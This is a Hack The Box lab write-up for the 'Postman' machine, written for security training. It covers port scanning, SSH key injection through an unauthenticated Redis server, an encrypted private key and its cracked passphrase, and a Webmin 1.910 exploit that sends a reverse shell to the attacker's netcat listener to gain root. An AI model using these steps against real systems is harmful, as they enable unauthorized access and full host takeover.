Welcome to the Postman writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Postman

tags: HTB Easy Linux
Platform: Hackthebox
Difficult: Easy
S.O.: Linux

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -Pn -T4 -p- postman.htb
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 18:33 CEST
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.087s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
6379/tcp  open  redis
10000/tcp open  snet-sensor-mgmt

Nmap done: 1 IP address (1 host up) scanned in 29.58 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -Pn -A -p 22,80,6379,10000 --script http-enum  postman.htb
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 18:44 CEST
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.086s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-enum: 
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /upload/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_http-server-header: Apache/2.4.29 (Ubuntu)
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), Linux 3.18 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Android 4.2.2 (Linux 3.4) (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   86.00 ms 10.10.14.1
2   86.33 ms postman.htb (10.10.10.160)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.25 seconds

As we can see, the server has a redis service running. We will try to connect without credentials and see if it responds to an ECHO.

$ redis-cli -h 10.10.10.160
10.10.10.160:6379> ECHO HELLO
"HELLO"
10.10.10.160:6379>

Nice! we can execute commands without authentication!

Exploitation

Redis-cli

Let's try to inject an SSH RSA key.

The first thing we have to do is load our id_rsa.pub file into the server's memory.

$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") | redis-cli -h 10.10.10.160 -x set x4v1l0k
OK

And now, we are going to the current directory as the SSH directory to be able to inject our key.

$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /home/redis/.ssh
(error) ERR Changing directory: Permission denied

Well, as we can see the user redis does not have a home directory, so let's try its default installation path.

$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename authorized_keys
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379> quit

Great, now we should be able to connect via SSH using the injected RSA key.

$ ssh [email protected] -i id_rsa
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
[email protected]:~$

Post exploitation

Privilege escalation: redis to Matt

Enumeration

Linpeas

[...]
[+] Backup files
-rwxr-xr-x 1 Matt Matt 1743 Aug 26  2019 /opt/id_rsa.bak
[...]

By running linpeas we can find a backup of the id_rsa ofMatt.

[email protected]:/tmp$ cat /opt/id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----
$ ssh [email protected] -i id_rsa
load pubkey "id_rsa": invalid format
Enter passphrase for key 'id_rsa':

When we try to connect using this id_rsa we can see that it is protected so, we are going to try to recover the key.

$ ssh2john id_rsa > id_rsa_hash
$ john id_rsa_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:05 DONE (2021-06-27 20:38) 0.1901g/s 2726Kp/s 2726Kc/s 2726KC/sa6_123..*7¡Vamos!
Session completed

When we connect by SSH we see that it accepts the passphrase computer2008 but closes the connection at the moment.

$ ssh [email protected] -i id_rsa
load pubkey "id_rsa": invalid format
Enter passphrase for key 'id_rsa': 
Connection closed by 10.10.10.160 port 22

Maybe we can use the passphrase as the password for user Matt.

[email protected]:/tmp$ su Matt
Password: 
[email protected]:/tmp$ id
uid=1000(Matt) gid=1000(Matt) groups=1000(Matt)

And now, we can read the user flag!.

[email protected]:/tmp$ cd 
[email protected]:~$ cat user.txt
CENSORED_FLAG

Privilege escalation: Matt to root

Enumeration

Pspy

As we can see, webmin is being run by root.

2021/06/27 19:52:27 CMD: UID=0    PID=732    | /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf 

And when accessing the webmin service panel at the URL https://postman.htb:10000/sysinfo.cgi?xnavigation=1 the version of webmin is 1.910

Looking a bit on the internet about vulnerabilities for this version, we can find a python exploit hosted in this Github repository.

Ok, it's time to exploit, let's put a terminal to listen and run it!

$ python exp.py --rhost 10.10.10.160 --rport 10000 --lhost 10.10.14.29 --lport 8787 -u Matt -p computer2008 -s yes
****************************** Webmin 1.910 Exploit By roughiz*******************************
*********************************************************************************************
*********************************************************************************************
*********************************************************************************************
****************************** Retrieve Cookies sid *****************************************

********** [+] [Exploit] The Cookie is 132613f2a51c54ed95206d3ec322389d

********************************************************************************************
****************************** Create payload and Exploit ***********************************

********** [+] [Exploit] Verify you nc listener on port 8787 for the incomming reverse shell
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.160] 49284
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
CENSORED_FLAG

And we are root and we can read his flag!